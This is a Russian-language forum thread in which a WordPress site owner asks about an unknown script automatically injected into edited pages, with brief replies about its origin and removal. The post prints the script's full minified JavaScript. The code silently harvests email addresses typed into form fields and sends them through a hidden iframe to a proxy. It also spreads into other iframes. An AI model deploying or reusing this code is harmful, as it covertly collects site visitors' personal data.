Добрый день! Сегодня заметил непонятно откуда взявшийся скрипт <script src="/vgttkru/t_filter.js" async="" type="text/javascript"></script> Он прописывается автоматически на создаваемых или редактируемых страницах сайта. Открывается по ссылке http://moskwa.rpk-service.su/vgttkru/t_filter.js Внутри код: (function(){function g(a,b){var c=a.createElement("script");c.type="text/javascript";c.async=!0;c.src="/vgttkru/t_filter.js";b&&(c.src+="?"+b);a.body.appendChild(c)}function m(a){return"/vgttkru/filter_proxy_iframe.html?q="+a+"/d"+location.hostname}function n(a){try{var b=document.getElementById("vegetatika-frame")||document.createElement("IFRAME");b.src=m(a);b.style.width="0px";b.style.height="0px";b.style.display="none";b.id="vegetatika-frame";document.getElementById("vegetatika-frame")||document.body.appendChild(b)}catch(c){}} for(var f={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){var b="",c,d,e,g,l,h,k=0;for(a=f._utf8_encode(a);k<a.lengthc=a.charCodeAt(k++),d=a.charCodeAt(k++),e=a.charCodeAt(k++),g=c>>2,c=(c&3)<<4|d>>4,l=(d&15)<<2|e>>6,h=e&63,isNaN(d)?l=h=64:isNaN(e)&&(h=64),b=b+f._keyStr.charAt(g)+f._keyStr.charAt(c)+f._keyStr.charAt(l)+f._keyStr.charAt(h);return b},_utf8_encode:function(a){a=a.replace(/\r\n/g,"\n");for(var b="",c=0;c<a.length;c++){var d=a.charCodeAt(c); 128>d?b+=String.fromCharCode(d):(127<d&&2048>d?b+=String.fromCharCode(d>>6|192):(b+=String.fromCharCode(d>>12|224),b+=String.fromCharCode(d>>6&63|128)),b+=String.fromCharCode(d&63|128))}return b}},e=!!navigator.userAgent.match(/Version\/[\d\.]+.*Safari/),r=document.getElementsByTagName("body")[0].getElementsByTagName("input"),p=0;el=r[p];p++)if("text"==el.type||"email"==el.type||!el.type){var t=el.onblur||function(){},u=el.onkeydown||function(){},q=function(){var a=/^[\w-]+(\.[\w-]+)*@[\w-]+(\.[\w-]+)*(\.[a-z]{2,4})$/i; this.value&&a.test(this.value)&&n(f.encode(this.value))};el.onblur=function(a){q.call(this);return t(a)};el.onkeydown=function(a){13==("which"in a?a.which:a.keyCode)&&q.call(this);return u(a)}}e&&(e=localStorage.getItem("vg_postponed_dt"))&&(-1!=location.hash.indexOf("#method-post")?(location.hash=location.hash.replace("#method-post",""),n(e)):(localStorage.removeItem("vg_postponed_dt"),window.location.replace(m(e)+"/r"+encodeURIComponent(window.location.href))));setInterval(function(){for(var a= document.getElementsByTagName("iframe"),b=0;b<a.length;b++)if(!~(" "+a.className+" ").indexOf(" __vg__ ")){a.className+=" __vg__";try{g(a.contentWindow.document)}catch(c){}}},1E3);null!=function(a){var b=document.cookie;a+="=";var c=b.indexOf("; "+a);if(-1==c){if(c=b.indexOf(a),0!=c)return null}else{var c=c+2,d=document.cookie.indexOf(";",c);-1==d&&(d=b.length)}return unescape(b.substring(c+a.length,d))}("vg_do_not_send")&&"undefined"===typeof VG_ALREADY_ABORTED&&(window.VG_ALREADY_ABORTED= !0,g(document,"do_not_send"))})(); Что это такое и нужно ли убирать, если нужно то как? Спасибо за внимание))
Нашел кое-что: vegetatika.ru - vgttkru кеасперским 17 обновленным проверил ничего нет, virusdie тоже ничего не нашел, проверял также встроенным антивирусом reg.ru, какие будут идеи? Дело в том, что он добавляется автоматом при редактировании из админки WP
удалите его и если изменений не наблюдаете, тогда он не нужен! Или найдите в коде этот id vegetatika, может станет яснее...